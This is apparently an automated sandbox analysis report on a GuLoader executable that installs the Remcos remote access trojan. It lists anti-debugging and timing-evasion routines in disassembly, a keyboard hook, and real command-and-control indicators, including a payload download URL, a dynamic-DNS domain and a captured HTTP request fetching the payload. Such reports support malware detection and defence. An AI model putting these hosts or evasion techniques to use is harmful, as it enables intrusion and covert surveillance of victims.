Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567CB5 second address: 0000000000567CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B03662D3h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B03662C9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B03661CCh 0x00000063 call 00007FB8B0366227h 0x00000068 call 00007FB8B03662F4h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567DF9 second address: 0000000000567DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0E656E2h 0x0000002e popad 0x0000002f call 00007FB8B0E65261h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056326F second address: 00000000005632FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [edi+00000814h], esi 0x00000009 mov esi, dword ptr [ebp+00000277h] 0x0000000f je 00007FB8B03663A8h 0x00000015 mov dword ptr [ebp+000001C9h], eax 0x0000001b mov eax, ecx 0x0000001d push eax 0x0000001e mov eax, dword ptr [ebp+000001C9h] 0x00000024 mov esi, dword ptr [edi+00000814h] 0x0000002a mov eax, dword ptr [edi+00000800h] 0x00000030 add eax, esi 0x00000032 add eax, ecx 0x00000034 test dh, dh 0x00000036 mov dword ptr [ebp+000001A6h], eax 0x0000003c mov eax, EC4E9022h 0x00000041 xor eax, 74E0F7A3h 0x00000046 xor eax, 4B60BED9h 0x0000004b sub eax, D3CED944h 0x00000050 cmp bh, 00000033h 0x00000053 push eax 0x00000054 mov eax, dword ptr [ebp+000001A6h] 0x0000005a mov dword ptr [ebp+0000018Fh], edx 0x00000060 mov edx, eax 0x00000062 push edx 0x00000063 mov edx, dword ptr [ebp+0000018Fh] 0x00000069 cmp ah, ch 0x0000006b mov ebx, edi 0x0000006d add ebx, 00000C00h 0x00000073 mov dword ptr [ebp+00000273h], ecx 0x00000079 mov ecx, ebx 0x0000007b cmp dl, al 0x0000007d push ecx 0x0000007e mov ecx, dword ptr [ebp+00000273h] 0x00000084 cmp dh, FFFFFFD7h 0x00000087 pushad 0x00000088 lfence 0x0000008b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

1_2_020F5781

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: threadDelayed 9165			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: foregroundWindowGot 557			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep count: 9165 > 30			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep time: -45825s >= -30000s			Jump to behavior

Sleep loop found (likely to delay execution)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Thread sleep count: Count: 9165 delay: -5

Jump to behavior

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWu
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH0

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

1_2_020F5781

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F6568 LdrInitializeThunk,

1_2_020F6568

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B mov eax, dword ptr fs:[00000030h]	1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F73B4 mov eax, dword ptr fs:[00000030h]	1_2_020F73B4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3441 mov eax, dword ptr fs:[00000030h]	1_2_020F3441
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5589 mov eax, dword ptr fs:[00000030h]	1_2_020F5589
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874 mov eax, dword ptr fs:[00000030h]	1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7898 mov eax, dword ptr fs:[00000030h]	1_2_020F7898
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B mov eax, dword ptr fs:[00000030h]	1_2_020F2D3B

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'

Jump to behavior

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Managerc
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Manager
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp, logs.dat.11.dr	Binary or memory string: [ Program Manager ]
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\z
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\q
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\,

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

Contacted Domains

Name	IP	Active
wealthyrem.ddns.net	194.5.97.128	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	true	Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_PRUu	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for submitted file

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Machine Learning detection for sample

Source: kGSHiWbgq9.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Uses dynamic DNS services

Source: unknown

DNS query: name: wealthyrem.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 194.5.97.128:39200

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp

String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\kGSHiWbgq9.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F90E6 NtProtectVirtualMemory,	1_2_020F90E6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873 NtWriteVirtualMemory,LoadLibraryA,	1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968 NtAllocateVirtualMemory,	1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A NtWriteVirtualMemory,	1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62 NtWriteVirtualMemory,NtAllocateVirtualMemory,	1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A NtWriteVirtualMemory,	1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C NtWriteVirtualMemory,	1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9 NtWriteVirtualMemory,	1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8FBB NtProtectVirtualMemory,	1_2_020F8FBB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6 NtWriteVirtualMemory,	1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C03 LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569C03
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B39 LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569B39
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C2B LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569C2B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B22 LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569B22

Detected potential crypto function

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5781	1_2_020F5781
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F94D8	1_2_020F94D8
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B	1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F05A1	1_2_020F05A1
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0BDC	1_2_020F0BDC
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873	1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968	1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0211	1_2_020F0211
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4339	1_2_020F4339
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F40B7	1_2_020F40B7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0691	1_2_020F0691
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86DB	1_2_020F86DB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86F4	1_2_020F86F4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A	1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F95C6	1_2_020F95C6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F85E7	1_2_020F85E7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62	1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A	1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2A77	1_2_020F2A77
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3ACE	1_2_020F3ACE
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0B59	1_2_020F0B59
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C	1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9	1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3BFF	1_2_020F3BFF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8802	1_2_020F8802
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874	1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F891F	1_2_020F891F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0921	1_2_020F0921
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F398F	1_2_020F398F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7E5C	1_2_020F7E5C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1E99	1_2_020F1E99
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0ED2	1_2_020F0ED2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3	1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8C2C	1_2_020F8C2C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CEF	1_2_020F3CEF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0CFA	1_2_020F0CFA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CF2	1_2_020F3CF2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B	1_2_020F2D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5D78	1_2_020F5D78
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1DA0	1_2_020F1DA0
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6	1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0DD5	1_2_020F0DD5

PE file contains strange resources

Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: kGSHiWbgq9.exe, 00000001.00000000.646609422.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 00000001.00000002.773544375.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000000.772049826.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726897873.0000000000860000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe

Uses 32bit PE files

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA49EFCEC46BBB65C.TMP

Jump to behavior

Source: kGSHiWbgq9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408873 push esp; ret	1_2_00408877
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004088C0 push esp; ret	1_2_004088CB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004014E9 push es; ret	1_2_004014EA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408CB2 push esi; ret	1_2_00408CB3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_0040891C push esi; retf	1_2_0040892F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407D36 pushad ; iretd	1_2_00407D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408672 push esi; ret	1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407E22 push ds; iretd	1_2_00407E27
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408624 push esp; ret	1_2_00408627
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408ADE push esi; retf	1_2_00408ADF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408695 push esi; ret	1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F6625 push ebp; iretd	1_2_020F6637

Source: initial sample

Static PE information: section name: .text entropy: 7.07266809617

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
